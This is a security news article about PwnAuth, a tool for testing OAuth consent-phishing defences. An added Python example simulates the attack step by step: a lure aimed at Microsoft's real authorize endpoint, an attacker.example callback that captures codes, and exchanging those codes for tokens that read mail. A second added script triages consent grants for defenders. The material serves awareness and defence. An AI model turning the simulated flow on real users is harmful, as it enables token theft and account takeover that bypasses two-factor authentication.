Organizations devote time and resources to stop users from giving away credentials in a spear phishing attempt and to respond quickly in case of such an attack. In contrast, less attention is paid to OAuth-based attacks, a lesser known form of social engineering. A new tool from FireEye gives organizations a testing platform for OAuth abuse.
OAuth 2.0 is a widely used authorization protocol that allows third-party applications to obtain limited access to a given web service. Attackers can use social engineering techniques to trick victims into authorizing malicious third-party applications to access their account, which gives them access to user data without having to steal user credentials.
Known as PwnAuth, the web application framework gives organizations a better understanding of how well they can detect and respond to OAuth abuse campaigns. Penetration testers can use the easy-to-use UI to manage malicious OAuth applications, store collected OAuth tokens, and interact with API resources. PwnAuth was released to increase awareness and detection capabilities as well as to provide countermeasures for defenders.
“OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data,” said Doug Bienstock, a senior consultant at Mandiant, FireEye’s incident response division.
Sites that allow users to log in with accounts on a third-party platform, such as Microsoft, Google, and Facebook, use OAuth. Consider an application that reads a user’s OneDrive to make it easy to share files: the application requests a specific set of permissions (scopes) to the user’s Microsoft account, the provider’s APIs define what each scope permits, and Microsoft, not the application, presents the consent prompt and issues the authorization.
For OAuth abuse, the attacker registers a malicious application with the resource provider and runs a web service at that application’s redirect URI, listening for authorization responses. Using social engineering, such as a specially crafted authorization URL in the body of a phishing email, the attacker convinces the user to grant the malicious application access. When the user consents, the provider redirects the browser to the attacker’s service with an authorization code, which the attacker exchanges for an access token (and typically a refresh token); the token gives access to the user’s data without a password. Access tokens, once saved, can bypass any two-factor mechanism that may be enabled, Bienstock said. The only way to stop the application from having access to the user account is for the user to manually revoke the application’s permissions.
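The exchange described above, as an added example that is not part of the original article or of PwnAuth’s code. Both sides are simulated in memory: a stand-in authorization server that issues a single-use code on consent and trades it for a bearer token, and an attacker listener at the redirect URI that captures the code and stores the token. The client ID, client secret, redirect URI, victim address and the tiny resource table are constructed; only the Microsoft authorize endpoint URL is real.

```python
"""Simulated OAuth 2.0 authorization-code consent phishing (added example)."""
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

# Real Microsoft identity platform v2.0 authorize endpoint; the lure points here,
# at the legitimate provider, not at attacker infrastructure.
AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"

# Constructed example values (hypothetical, not a real app registration).
CLIENT_ID = "00000000-1111-2222-3333-444444444444"
CLIENT_SECRET = "not-a-real-secret"
REDIRECT_URI = "https://attacker.example/callback"


def build_consent_url(client_id, redirect_uri, scopes, state):
    """Build the 'specially crafted URL' sent to the victim."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state,
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


class SimulatedAuthorizationServer:
    """Stand-in for the resource provider (no real HTTP)."""

    def __init__(self):
        self._codes = {}   # code -> (client_id, redirect_uri, user, scopes)
        self._tokens = {}  # access_token -> (user, scopes)

    def user_consents(self, consent_url, user):
        """The victim clicks the lure and accepts the consent prompt. Returns the
        redirect the browser is sent to: redirect_uri?code=...&state=..."""
        q = parse_qs(urlparse(consent_url).query)
        code = secrets.token_urlsafe(32)
        self._codes[code] = (q["client_id"][0], q["redirect_uri"][0], user, q["scope"][0].split())
        return f"{q['redirect_uri'][0]}?{urlencode({'code': code, 'state': q['state'][0]})}"

    def exchange_code(self, client_id, client_secret, code, redirect_uri):
        """Token endpoint: the code is single use and bound to the client and redirect URI.
        With offline_access a real provider also returns a refresh token (not simulated)."""
        entry = self._codes.pop(code, None)
        if entry is None or entry[0] != client_id or entry[1] != redirect_uri:
            raise PermissionError("invalid or replayed authorization code")
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (entry[2], entry[3])
        return {"access_token": token, "token_type": "Bearer", "scope": " ".join(entry[3])}

    def graph_api(self, bearer_token, resource):
        """Resource access checks only the bearer token and its scopes: no password
        and no second factor are involved at this point."""
        required = {"/me/messages": "Mail.Read", "/me/contacts": "Contacts.Read"}[resource]
        if bearer_token not in self._tokens:
            raise PermissionError("unknown token")
        user, scopes = self._tokens[bearer_token]
        if required not in scopes:
            raise PermissionError(f"token lacks scope {required}")
        return {"user": user, "resource": resource}


class AttackerListener:
    """The web service behind REDIRECT_URI: captures codes, trades them for tokens."""

    def __init__(self, auth_server):
        self.auth = auth_server
        self.pending_states = set()
        self.tokens = []  # captured tokens, as a PwnAuth-style store would keep them

    def new_lure(self, scopes):
        state = secrets.token_urlsafe(16)
        self.pending_states.add(state)
        return build_consent_url(CLIENT_ID, REDIRECT_URI, scopes, state)

    def handle_callback(self, callback_url):
        q = parse_qs(urlparse(callback_url).query)
        state = q.get("state", [None])[0]
        if state not in self.pending_states:
            return None  # unsolicited or replayed callback: ignore it
        self.pending_states.discard(state)
        token = self.auth.exchange_code(CLIENT_ID, CLIENT_SECRET, q["code"][0], REDIRECT_URI)
        self.tokens.append(token)
        return token


def run_campaign():
    """Full flow: lure -> consent on the legitimate provider -> callback -> token -> data."""
    auth = SimulatedAuthorizationServer()
    attacker = AttackerListener(auth)
    lure = attacker.new_lure(["Mail.Read", "Contacts.Read", "offline_access"])
    callback = auth.user_consents(lure, "victim@example.com")  # constructed victim
    token = attacker.handle_callback(callback)
    mail = auth.graph_api(token["access_token"], "/me/messages")
    replay = attacker.handle_callback(callback)  # second delivery of the same callback
    return lure, token, mail, replay


if __name__ == "__main__":
    lure, token, mail, _ = run_campaign()
    print("lure:", lure)
    print("captured scopes:", token["scope"])
    print("read mail of:", mail["user"])
```

Note that every page the victim sees is served by the provider; the attacker’s host appears only in the redirect, which is why the lure is hard to distinguish from a legitimate consent request.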
“Because all victim interaction is on sites owned by the legitimate Resource Provider (e.g. Microsoft), it can be hard for an untrained user to differentiate between a legitimate OAuth application and a malicious one,” Bienstock said.
Last year, a phishing attack targeting Gmail users tricked many of them into granting a malicious app named “Google Docs” access to their contact information. It worked because the email looked like a legitimate Google Docs request to share a document, and the consent prompt itself was genuine: it was served by Google in response to a real OAuth request.
PwnAuth runs in a Docker container and requires TLS (SSL) certificates and an NGINX front end (a sample NGINX configuration file is on GitHub). A penetration tester first registers a Microsoft application, then tricks potential victims into opening a specially crafted authorization URL that points to that application; consenting at that URL is the action that grants the application its permissions. PwnAuth’s web service listens at the application’s redirect URI, captures the resulting OAuth tokens, and can then use them to query the Microsoft Graph API for the user’s data. PwnAuth can be used to test users in any cloud environment as long as the malicious application is an Office 365 application.
Bienstock released PwnAuth as an open source project and the code is available on GitHub. Currently, there is only a module for O365 applications, although Bienstock plans to add modules for other cloud environments. The user interface and framework are designed to be easily extendable to other API Resources. Bienstock also released an OAuthHunting script for administrators to look for artifacts left behind by malicious OAuth applications in cloud environments. He said scripts to investigate other cloud environments will be added at a later time.
“Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack,” Bienstock said.
Mitigations include limiting the potential impact of malicious applications by restricting the API scopes third-party applications can request, disabling third-party apps entirely, whitelisting or blacklisting applications, querying the organization’s user base for all consented applications, and logging user consent events. Office 365 also lets administrators block access to third-party applications, record when a user consents to a third-party application, and revoke access if a malicious app was granted it. Organizations can also add OAuth abuse scenarios to their social engineering programs.
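One way to act on the last two mitigations, querying consented applications and reviewing the result, as an added example that is neither the article’s nor the OAuthHunting script’s code. The grant records below are constructed and only loosely modelled on a delegated permission grant (consenting application, its ID, the user, and a space-separated scope string); the allowlist, the high-risk scope set and the impersonated product names are assumptions a team would tune for its own tenant.

```python
"""Triage of delegated OAuth permission grants (added example, constructed data)."""
from collections import defaultdict

# Scopes that give an application standing access to mail, files or contacts,
# or let it keep access while the user is absent (offline_access). Assumed list.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Contacts.Read", "offline_access",
}

# Display names a lure is likely to borrow from a first-party product. Assumed list.
IMPERSONATED_NAMES = {"google docs", "microsoft", "office 365", "onedrive", "sharepoint"}

# Applications the organization has reviewed and approved (constructed IDs).
APPROVED_APP_IDS = {
    "10000000-0000-0000-0000-000000000001",  # expense tool
    "10000000-0000-0000-0000-000000000003",  # file sync client
}

# Constructed grant records; not real audit-log or Graph output.
GRANTS = [
    {"app": "Contoso Expense Tool", "app_id": "10000000-0000-0000-0000-000000000001",
     "user": "alice@example.com", "scope": "User.Read"},
    {"app": "Google Docs", "app_id": "10000000-0000-0000-0000-000000000002",
     "user": "bob@example.com", "scope": "Mail.Read Contacts.Read offline_access"},
    {"app": "Google Docs", "app_id": "10000000-0000-0000-0000-000000000002",
     "user": "carol@example.com", "scope": "Mail.Read Contacts.Read offline_access"},
    {"app": "SharePoint Sync", "app_id": "10000000-0000-0000-0000-000000000003",
     "user": "dave@example.com", "scope": "Files.Read.All"},
    {"app": "Team Calendar Helper", "app_id": "10000000-0000-0000-0000-000000000004",
     "user": "erin@example.com", "scope": "Calendars.Read"},
]


def triage_grants(grants, approved_app_ids=APPROVED_APP_IDS,
                  high_risk=HIGH_RISK_SCOPES, impersonated=IMPERSONATED_NAMES):
    """Group grants by application, drop approved apps, and score the rest.

    An unapproved app is 'high' if it holds any high-risk scope or borrows a
    first-party product name; findings are ordered so the widest-spread
    high-severity app comes first, which is the one to revoke and investigate."""
    by_app = defaultdict(lambda: {"name": None, "users": set(), "scopes": set()})
    for g in grants:
        entry = by_app[g["app_id"]]
        entry["name"] = g["app"]
        entry["users"].add(g["user"])
        entry["scopes"].update(g["scope"].split())

    findings = []
    for app_id, entry in by_app.items():
        if app_id in approved_app_ids:
            continue
        risky = sorted(entry["scopes"] & high_risk)
        lookalike = entry["name"].lower() in impersonated
        findings.append({
            "app_id": app_id,
            "name": entry["name"],
            "users": sorted(entry["users"]),
            "risky_scopes": risky,
            "lookalike_name": lookalike,
            "severity": "high" if (risky or lookalike) else "low",
        })
    findings.sort(key=lambda f: (f["severity"] != "high", -len(f["users"]), f["name"]))
    return findings


if __name__ == "__main__":
    for f in triage_grants(GRANTS):
        print(f["severity"].upper(), f["name"], f["app_id"],
              "users:", ", ".join(f["users"]), "risky:", ", ".join(f["risky_scopes"]))
```

The same grouping is what turns a consent-event log into an incident signal: several users consenting to one unapproved application with mail or contact scopes in a short window is the footprint of a campaign, not of individual users trying a new tool.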
“As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants,” Bienstock said.